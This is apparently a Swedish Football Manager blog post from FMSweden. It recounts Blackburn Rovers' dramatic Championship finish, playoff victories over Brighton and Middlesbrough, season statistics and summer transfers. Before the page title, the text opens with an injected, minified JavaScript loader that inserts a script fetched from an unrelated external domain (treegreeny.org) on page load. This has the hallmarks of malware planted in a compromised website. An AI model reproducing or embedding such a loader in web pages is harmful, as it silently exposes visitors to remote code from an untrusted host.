;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – (Blackburn Rovers) Wembley! – FMSweden
Meny Stäng

Start of the week – (Blackburn Rovers) Wembley!

När Sky Sports ringde, den 1:a februari den här säsongen för en liknande intervju som säsongen innan, hade vi varken tid eller lust att svara och prata med media. Siktet var inställt på PL och det gjordes allt i vår makt för att ta oss dit så därför spolar vi fram till slutet av säsongen.

Slutet på Championship

Slutet på den här säsongen var bland det svettigare jag varit med om på FM. Mellan omgång 18 och 41 låg vi hela tiden på en av dem två uppflyttningsplatserna. Omgång 41 halkar vi ner till en tredjeplats för att direkt studsa tillbaka och när omgång 44 är färdigspelad leder vi Championship.

I minut 84 i omgång 45 leder vi med 2–0 borta mot Hull vilket var ett resultat som skulle lett till att vi hade allt i egna händer i sista omgången hemma mot Shrewsbury. När omgång 45 är färdigspelad har vi ingenting i egna händer, tillbaka på en tredjeplats inför sista omgången och datorn var nära att få flyga ut på parkeringen. Hull kvitterar till 2-2 efter mål i minut 86 och 93 och vi fick återigen nöja oss med slutspel efter en helt galen avslutning på säsongen.

Slutspelet

Det var ett sargat lag som tog sig an Brighton i semifinalen av slutspelet. Även om hela Championships skyttekung Adam Armstrong kunde göra 1–0 på straff kunde Brighton vända och vinna med 2-1 och där och då var det nattsvart. Det man ska ha med sig in till sista matchen är att målskyttet hade helt stagnerat och det var Danny Welbeck som hade klivit fram när Armstrong inte satte dit bollarna som vi varit vana vid under säsongen men i returen mot Brighton kliver Armstrong fram när det behövs som mest. 2-1 sätter han dit i minut 85 och förlängning väntade. Super-sub Ben Brereton skjuter in 3-1 i den 106:e minuten och supportrarna kunde boka tåg till Wembley.

Den stora finalen och den finaste matchen vi har i fotbollens värld väntade. Vindarna hade vänt efter en tung avslutning på säsongen och i finalen var det inget snack. Efter 38 minuter hade firma Welbeck/Armstrong totalt asfalterat Middlesbrough. Kaptenen för dagen Bradley Dack kunde fastställa slutresultatet till 4-0 sent i matchen. Vi är tillbaka!

Statistik från säsongen

Mål: 78 mål

Insläppta mål: 35 mål

Skyttekung: Adam Armstrong 31 mål (Vinner skytteligan i Championship)

Assistkung: Harry Pickering 14 assist

Bästa spelare: Adam Armstrong 31+3 7.10

Flipp: Danny Welbeck 19+6 7.07

Flopp: Harvey Eliott 3+5 på 38 matcher

Tabell:

Silly Season:

Ekonomin har skötts felfritt under tiden i Championship och med Premier League pengarna säkrade fick vi en budget på 400 miljoner att köpa för. Vi gör ett riktigt bra fönster i min mening där vi framförallt gör ett par helt sjuka försäljningar där talanger som jag inte ser nå Premier League nivå säljs för 80mn kr (Jack Vale) respektive 52,5mn kr (Tyrhys Dolan). In kommer ett flertal talangfulla spelare där jag främst ser framåt Ronaldo Camara och Franco Tongya samarbeta på ett mittfält.

IN: Totalt: 221,5 miljoner kr

Franco Tongya 20 år CM (Norwich) 107mn kr

Hamsa Choudhury 24 år CDM (Leicester) 57,5 mn kr

Talles Magno 20 år VY (Vasco Da Gama) 44mn kr

Xavier Amaechi 21 år VY/HY (HSV) 13mn kr

Ronaldo Camara CM 19 år (Benfica) Gratis

Lorenzo Tonelli 32 år MB (Sampdoria) Gratis

Harvey Eliott 19 år HY (Liverpool) LÅN

William Saliba 21 år MB (Arsenal) LÅN

UT: Totalt: 228,7 miljoner kronor

Jack Vale 21 år VY (Southampton) 80mn kr

Lewis Travis 24 år CDM/CM (Crystal Palace) 67,5 mn kr

Tyrhys Dolan 20 år HY/ANF (Sheffield United) 52,5 mn kr

Lewis Holtby 31 år CM (Arminia Bielefeld) 28mn kr

Bilal Hussein 22 år CM (Legia Warzawa) LÅN – 700t låneavgift

Blackburn Rovers är äntligen tillbaka i Premier League! Nästa vecka hugger vi tänderna i comeback-säsongen i PL.

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar